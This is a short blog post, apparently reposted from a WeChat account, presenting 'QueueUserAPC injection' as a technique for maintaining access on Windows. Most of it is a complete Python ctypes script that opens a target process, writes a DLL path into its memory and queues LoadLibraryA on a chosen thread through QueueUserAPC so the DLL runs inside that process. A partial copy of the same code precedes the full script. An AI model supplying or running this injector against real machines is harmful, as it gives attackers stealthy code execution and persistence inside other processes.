https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
DWORD QueueUserAPC(
PAPCFUNC pfnAPC,
HANDLE hThread,
ULONG_PTR dwData
);
LLA = ctypes.windll.kernel32.GetProcAddress(handle, b'LoadLibraryA')
PAPCFUNC = ctypes.WINFUNCTYPE(None,LPVOID)
start = PAPCFUNC(LLA)
THREAD_SET_CONTEXT = 0x0010
h_thread = ctypes.windll.kernel32.OpenThread(THREAD_SET_CONTEXT, False, int(tid))
ctypes.windll.kernel32.QueueUserAPC.argtypes = LPVOID,HANDLE,LPVOID
ctypes.windll.kernel32.QueueUserAPC(start, h_thread, arg_address)
import ctypes
from ctypes import *
from ctypes.wintypes import *
import sys,os
def inject(file,pid,tid):
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
h_process = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
if h_process:
dll_path = os.path.abspath(file)
print(dll_path)
dll_path = bytearray(dll_path)
arg_address = ctypes.windll.kernel32.VirtualAllocEx(h_process, ctypes.c_int(0), ctypes.c_int(len(dll_path)),ctypes.c_int(0x3000), ctypes.c_int(0x04))
buf = (ctypes.c_char * len(dll_path)).from_buffer(dll_path)
ctypes.windll.kernel32.WriteProcessMemory(h_process, arg_address, buf, len(dll_path))
ctypes.windll.kernel32.GetModuleHandleW.argtypes = [c_wchar_p]
ctypes.windll.kernel32.GetModuleHandleW.restype = c_void_p
handle = ctypes.windll.kernel32.GetModuleHandleW("kernel32")
ctypes.windll.kernel32.GetProcAddress.argtypes = [c_void_p, c_char_p]
ctypes.windll.kernel32.GetProcAddress.restype = c_void_p
LLA = ctypes.windll.kernel32.GetProcAddress(handle, b'LoadLibraryA')
print("LoadLibraryA:{}".format(LLA))
PAPCFUNC = ctypes.WINFUNCTYPE(None,LPVOID)
start = PAPCFUNC(LLA)
THREAD_SET_CONTEXT = 0x0010
h_thread = ctypes.windll.kernel32.OpenThread(THREAD_SET_CONTEXT, False, int(tid))
ctypes.windll.kernel32.QueueUserAPC.argtypes = LPVOID,HANDLE,LPVOID
ctypes.windll.kernel32.QueueUserAPC(start, h_thread, arg_address)
ctypes.windll.kernel32.CloseHandle(h_thread)
ctypes.windll.kernel32.CloseHandle(h_process)
else:
print("open process error")
sys.exit()
if __name__ == '__main__':
inject(sys.argv[1],sys.argv[2],sys.argv[3])
本文始发于微信公众号(XG小刚):维持访问-QueueUserAPC注入分析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论